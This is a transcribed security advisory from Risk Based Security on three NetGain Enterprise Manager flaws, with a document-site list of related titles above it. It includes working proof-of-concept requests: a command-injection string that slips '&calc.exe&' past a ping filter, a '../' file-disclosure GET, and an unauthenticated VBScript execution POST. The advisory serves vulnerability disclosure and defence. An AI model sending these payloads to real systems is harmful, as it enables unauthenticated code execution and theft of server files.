RBS NetGain Enterprise Manager Web Interface Multiple Vulnerabilities of 9

Similar documents
RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

RBS OpenEMR Multisite Setup Improper Access Restriction Remote Code Execution of 5

RBS Axis Products Management Web Interface Multiple Vulnerabilities of 9

RBS of 6

RBS Asante VMS ActiveXCoat ActiveX Control ConnectToVMS() Method Heap Buffer Overflow of 7

RBS S Pocketnet Tech MediaViewer ActiveX Control Multiple Buffer Overflow Vulnerabilities of 14

RBS EverFocus Electronics Corp EPlusOcx ActiveX Control Multiple Stack Buffer Overflows of 10

RBS Rockwell Automation FactoryTalk Services Platform RNADiagnostics Module Missing Size Field Validation Remote Denial of Service.

Cross-Site Request Forgery in Cisco SG220 series

RiskSense Attack Surface Validation for Web Applications

Multiple vulnerabilities in Vectra Cognito

ISO COMPLIANCE GUIDE. How Rapid7 Can Help You Achieve Compliance with ISO 27002

SANS ICS Europe 2018 Munich, Germany

Neat tricks to bypass CSRF-protection. Mikhail

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability

Protecting Against Modern Attacks. Protection Against Modern Attack Vectors

VULNERABILITY ADVISORY

Lab 5: Web Attacks using Burp Suite

Web Security: Vulnerabilities & Attacks

the SWIFT Customer Security

Chapter 5: Vulnerability Analysis

Continuously Discover and Eliminate Security Risk in Production Apps

Microsoft SDL 한국마이크로소프트보안프로그램매니저김홍석부장. Security Development Lifecycle and Building Secure Applications

Secure coding practices

Sense of Security Security Advisory SOS CA Workload Automation AE SQL Injection. 29 March 2018.

01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED

10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS

Data Breach Risk Scanning and Reporting

Cloudy with a chance of hack. OWASP November, The OWASP Foundation Lars Ewe CTO / VP of Eng. Cenzic

Security Research Advisory ToutVirtual VirtualIQ Pro Multiple Vulnerabilities

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

7 Steps to Complete Privileged Account Management. September 5, 2017 Fabricio Simao Country Manager

NOTHING IS WHAT IT SIEMs: COVER PAGE. Simpler Way to Effective Threat Management TEMPLATE. Dan Pitman Principal Security Architect

SECURITY TESTING. Towards a safer web world

HP 2012 Cyber Security Risk Report Overview

Penetration Test Report

CASP CompTIA Advanced Security Practitioner Study Guide: (Exam CAS-001)

Web Application Security GVSAGE Theater

Vulnerability Management & Vulnerability Assessment. Nessus Attack Scripting Language (NASL). CVE databases, NVD database

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

CyberArk Privileged Threat Analytics

Microsoft Security Management

Security analysis and assessment of threats in European signalling systems?

Joe Stocker, CISSP, MCITP, VTSP Patriot Consulting

Optimizing Infrastructure Management with Predictive Analytics: The Red Hat Insights Approach

Secure Programming Techniques

Engineering Your Software For Attack

CompTIA Security+ Study Guide (SY0-501)

RiskSense Attack Surface Validation for IoT Systems

CoreMax Consulting s Cyber Security Roadmap

CSWAE Certified Secure Web Application Engineer

Test Harness for Web Application Attacks

haltdos - Web Application Firewall

String Analysis for the Detection of Web Application Flaws

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Oracle Linux Management with Oracle Enterprise Manager 13c O R A C L E W H I T E P A P E R J U L Y

Risk Intelligence. Quick Start Guide - Data Breach Risk

EV CHARGING: MAPPING OUT THE CYBER SECURITY THREATS AND SOLUTIONS FOR GRIDS AND CHARGING INFRASTRUCTURE

SailPoint IdentityIQ Integration with the BeyondInsight Platform. Providing Complete Visibility and Auditing of Identities

Case Study: The Evolution of EMC s Product Security Office. Dan Reddy, CISSP, CSSLP EMC Product Security Office

Securing Privileged Access and the SWIFT Customer Security Controls Framework (CSCF)

Cyber security tips and self-assessment for business

Integrigy Consulting Overview

MOBILE COMPUTING. Web Applications. (INTRODUCTION, Architecture and Security) Lecture-10 Instructor : Mazhar Hussain

Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output:

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

"Charting the Course to Your Success!" Securing.Net Web Applications Lifecycle Course Summary

WHITEHAT SECURITY. T.C. NIEDZIALKOWSKI Technical Evangelist. DECEMBER 2012

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

Managed Application Security trends and best practices in application security

IoT & SCADA Cyber Security Services

Threat Modeling. Bart De Win Secure Application Development Course, Credits to

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel

PT Unified Application Security Enforcement. ptsecurity.com

Penetration testing a building automation system

WEB SECURITY p.1

BUILDING CYBERSECURITY CAPABILITY, MATURITY, RESILIENCE

Protect Your Organization from Cyber Attacks

Centrify Infrastructure Services

Mapping BeyondTrust Solutions to

10 FOCUS AREAS FOR BREACH PREVENTION

Defense-in-Depth Against Malicious Software. Speaker name Title Group Microsoft Corporation

Enhancing the Cybersecurity of Federal Information and Assets through CSIP

Secure Application Development. OWASP September 28, The OWASP Foundation

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Adaptive Authentication Adapter for Citrix XenApp. Adaptive Authentication in Citrix XenApp Environments. Solution Brief

Security In A Box. Modular Security Services Offering - BFSI. A new concept to Security Services Delivery.

Technology Risk Management in Banking Industry. Rocky Cheng General Manager, Information Technology, Bank of China (Hong Kong) Limited

WatchGuard AP - Remote Code Execution

Privilege Security & Next-Generation Technology. Morey J. Haber Chief Technology Officer

Keep the Door Open for Users and Closed to Hackers

Abysssec Research. 1) Advisory information. 2) Vulnerability Information

RSA INCIDENT RESPONSE SERVICES

locuz.com SOC Services

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

RSA INCIDENT RESPONSE SERVICES

IBM Managed Security Services for X-Force Hosted Threat Analysis Service

MigrationWiz Security Overview

LTI Security Services. Intelligent & integrated Approach to Cyber & Digital Security

Transcription:

RBS-2017-003 NetGain Enterprise Manager Web Interface Multiple Vulnerabilities 2018-03-22 1 of 9

Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details 3 tools.exec_jsp Servlet command Parameter Remote Command Injection 3 common.download_jsp Servlet filename Parameter Path Traversal File Disclosure 5 /u/jsp/designer/script_test.jsp Improper Access Restriction Remote Code Execution 7 Solution 8 References 8 Timeline 8 About Risk Based Security 9 Company History 9 Solutions 9 2018-03-22 2 of 9

Vendor / Product Information NetGain Systems is a Singapore-based company that develops NetGain Enterprise Manager - a web-based IT infrastructure monitoring and management solution. The product is one of four solutions sold to over 500 companies worldwide. Vulnerable Program Details Details for tested products and versions: Vendor: NetGain Product: NetGain Enterprise Manager Version: 7.2.806 build 1116, 10.0.6 build 50, 10.0.8 build 51 NOTE: Other versions than the one listed above are likely affected. Credits Sven Krewitt, Risk Based Security Twitter: @RiskBased Impact NetGain Enterprise Manager provides a web-based management interface for configuring and viewing all monitored network devices and applications. This web interface is affected by multiple vulnerabilities that allow remote code execution or information disclosure. The web interface is usually run with administrator privileges. Vulnerability Details tools.exec_jsp Servlet command Parameter Remote Command Injection The web-based interface provides a functionality to invoke the ping command for user-defined IP addresses. While previously reported by a third party in an earlier version, it was determined to have been incompletely fixed in version 7.2.586 build 877. 2018-03-22 3 of 9

The ping command is executed using the following request in the web interface: POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: 192.168.210.135:8081 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=utf-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.210.135:8081/u/index.jsp Content-Length: 104 Cookie: JSESSIONID=42A03F28CC39EA78CD02846FE931BD74 Connection: close command=cmd+%2fc+ping&argument=127.0.0.1&async_output=ping1511871848929&iswindows=true According to the web/web-inf/web.xml file that is included in the application, the related servlet class is org.apache.jsp.u.jsp.tools.exec_jsp. <servlet> <servlet-name>org.apache.jsp.u.jsp.tools.exec_jsp</servlet-name> <servlet-class>org.apache.jsp.u.jsp.tools.exec_jsp</servlet-class> </servlet> [...] <servlet-mapping> <servlet-name>org.apache.jsp.u.jsp.tools.exec_jsp</servlet-name> <url-pattern>/u/jsp/tools/exec.jsp</url-pattern> </servlet-mapping> The class file is found in ngjsp.jar within the subdirectory web/lib. Surprisingly, not only the exec_jsp.class file was included in the jar file under org/apache/jsp/u/jsp/tools, but also exec_jsp.java, which made decompilation unnecessary. The following excerpt consists of code for parsing the parameters and executing the ping utility: String command = getparameter(request, "command"); String s = getparameter(request, "argument"); String argument = Utility.tokenize(s, " ")[0]; if (SysConfig.getIntProperty("allowDiscoveryByHostname") == 1 && [1] command.indexof("ping")>=0) { try { InetAddress address = InetAddress.getByName(argument); argument = address.gethostaddress(); catch (Exception e) { 2018-03-22 4 of 9

command = command + " " + argument; StringBuffer asyncoutput = null; String asyncoutputid = request.getparameter("async_output"); if (asyncoutputid!= null) { asyncoutput = (StringBuffer)session.getAttribute("exec_async_output"+asyncOutputId); if (asyncoutput == null) { asyncoutput = new StringBuffer(); session.setattribute("exec_async_output"+asyncoutputid, asyncoutput); try { if( IPAddressUtil.isValidAddress(argument) && [2] (command.tolowercase().startswith("cmd /c ping") command.tolowercase().startswith("ping -c 5")) && [3] AbstractAction.isSessionValid(session) ){ Process p = Runtime.getRuntime().exec(command); ExecStreamReader errrdr = new ExecStreamReader(); errrdr.m_process = p; errrdr.m_out = out; errrdr.m_output = asyncoutput; errrdr.start(); The current code takes the command and argument parameters and ensures that only the first element of the space-separated argument string is used [1] the provided argument is a valid IP address [2] the provided command starts with the string cmd /c ping or ping -c 5 [4] The following command string would pass all tests and allow executing e.g. calc.exe (more complex commands are possible as space characters can be included): command=cmd+%2fc+ping%26calc.exe%26ping The above analysis is based on version 7.2.806 build 1116, but the vulnerability also impacts version 10.0.6 build 50 and 10.0.8 build 51. common.download_jsp Servlet filename Parameter Path Traversal File Disclosure The web interface provides various ways to download log files or reports that are stored on the server s file system. One servlet related to downloads is referenced in web/web-inf/web.xml : <servlet> <servlet-name>org.apache.jsp.u.jsp.common.download_jsp</servlet-name> <servlet-class>org.apache.jsp.u.jsp.common.download_jsp</servlet-class> </servlet>... 2018-03-22 5 of 9

<servlet-name>org.apache.jsp.u.jsp.common.download_jsp</servlet-name> <url-pattern>/u/jsp/common/download.jsp</url-pattern> Similar to the exec_jsp class, the java file for this class can be found in ngjsp.jar. The following excerpt shows the vulnerable function: public void _jspservice(httpservletrequest request, HttpServletResponse response) throws java.io.ioexception, ServletException { session = pagecontext.getsession(); out = pagecontext.getout(); String user = WebService.getUser(session); [1] if (user == null) return; String filename = (String)request.getAttribute("filename"); [2] if (filename == null) { filename = request.getparameter("filename"); String srcdir = request.getparameter("srcdir"); if (srcdir == null) { srcdir = "tmp"; srcdir = netgain.sac.sysconfig.web_dir+file.separator+srcdir; String fullpath = srcdir+file.separator+filename; [3] File file = new File(fullpath); if (!file.exists()) { String s = Local.L1("File not found: {0", filename); request.setattribute("errormessage", s); pagecontext.forward("/u/jsp/common/error.jsp"); return; String extension = (String)request.getParameter("extension"); if (extension!= null) { filename = filename+"."+extension; response.resetbuffer(); response.setheader("content-disposition", "attachment;filename=\""+filename+"\""); InputStream in = new FileInputStream(file); [4] //ServletOutputStream outs = response.getoutputstream(); int bit = 256; try { while ((bit) >= 0) { bit = in.read(); if (bit >= 0) { out.write(bit); catch (IOException ioe) { //ioe.printstacktrace(system.out); out.flush(); //outs.close(); in.close(); The function checks whether a user session exists [1] and takes the filename parameter from the request [2]. A full path to a file is compiled using the filename parameter without further sanitization [3]. The content of this file is then read and passed in the response [4]. Using path traversal sequences such as../, an authenticated attacker can access arbitrary files the NetGain process has access to. GET /u/jsp/common/download.jsp?filename=../robots.txt 2018-03-22 6 of 9

The above analysis is based on version 7.2.806 build 1116, but the vulnerability also impacts version 10.0.6 build 50 and 10.0.8 build 51. /u/jsp/designer/script_test.jsp Improper Access Restriction Remote Code Execution In the Monitor section of the web-based management interface, the Customize section allows to test scripts in various formats that are executed on different hosts. The interface allows to choose between JavaScript, Unix Shell, and Visual Basic scripts and executes the script on the selected IP address if a NetGain agent is running on that system. The following example demonstrates the execution of arbitrary system commands via Visual Basic. 'Dim oshell Set oshell = WScript.CreateObject ("WScript.Shell") oshell.run "cmd.exe /C calc.exe" Set oshell = Nothing' The request to execute this script on the selected IP does not require authentication. This allows unauthenticated, remote attackers to execute arbitrary commands on any connected NetGain agent. POST /u/jsp/designer/script_test.jsp HTTP/1.1 Host: [IP]:8081 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=utf-8 X-Requested-With: XMLHttpRequest 2018-03-22 7 of 9

Referer: http://[ip]:8081/u/index.jsp Content-Length: 182 Cookie: JSESSIONID=[arbitrary] Connection: close type=vbs&content='dim+oshell%0aset+oshell+%3d+wscript.createobject+ (%22WScript.Shell%22)%0AoShell.run+%22cmd.exe+%2FC+calc.exe%22%0ASet +oshell+%3d+nothing'&args=&count=0&ip=localhost The above analysis is based on version 7.2.806 build 1116. Solution We are not currently aware of a solution for these vulnerabilities. RBS contacted the vendor prior to disclosing the details, but a third-party, who independently discovered these vulnerabilities, published their advisory during the coordination process and claimed the vulnerabilities had been addressed by the vendor in the latest version. Additional analysis performed by RBS concluded that the vulnerabilities were improperly fixed. Due to the vulnerability details being public, and the vendor failing to fix the vulnerabilities in a timely manner, RBS was forced to alert customers and publish this report without a patch being available. References RBS: 1 RBS-2017-003 VulnDB: 170893, 170894, 170895 Timeline 2017-11-30 Vendor informed about vulnerability 2017-12-13 Alert sent to RBS VulnDB clients due to third-party disclosure 2018-03-22 Publication of this vulnerability report 1 https://www.riskbasedsecurity.com/research/rbs-2017-003.pdf 2018-03-22 8 of 9

About Risk Based Security Risk Based Security offers clients fully integrated security solutions, combining real-time vulnerability and threat data, as well as the analytical resources to understand the implications of the data, resulting in not just security, but the right security. Company History Risk Based Security, Inc. (RBS) was established to support organizations with the technology to turn security data into actionable information and a competitive advantage. We do so by enhancing the research available and providing a first of its kind risk identification and evidence-based security management service. As a data driven and vendor neutral organization, RBS is able to deliver focused security solutions that are timely, cost effective, and built to address the specific threats and vulnerabilities most relevant to the organizations we serve. We not only maintain vulnerability and data breach databases, we also use this information to inform our entire practice. Solutions VulnDB - Vulnerability intelligence, alerting, and third party library tracking based on the largest and most comprehensive vulnerability database in the world. Available as feature-rich SaaS portal or powerful API. Vendor evaluations including our Vulnerability Timeline and Exposure Metrics (VTEM), Cost of Ownership ratings, Code Maturity, and Social Risk Scores. Cyber Risk Analytics - Extensive data breach database including interactive dashboards and breach analytics. Clients are able to gather and analyze security threat and data breach information on businesses, industries, geographies, and causes of loss. It also allows monitoring of domains for data breaches and leaked credentials as well as implementing a continuous vendor management program with our PreBreach data. YourCISO - Revolutionary service that provides organizations an affordable security solution including policies, vulnerability scans, awareness material, incident response, and access to high quality information security resources and consulting services. Vulnerability Assessments (VA) and Pentesting - Regularly scheduled VAs and pentests help an organization identify weaknesses before the bad guys do. Managing the most comprehensive VDB puts us in a unique position to offer comprehensive assessments, combining the latest in scanning technology and our own data. Detailed and actionable reports are provided in a clear and easy to understand language. Security Development Lifecycle (SDL) - Consulting, auditing, and verification specialized in breaking code, which in turn greatly increases the security of products. 2018-03-22 9 of 9

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback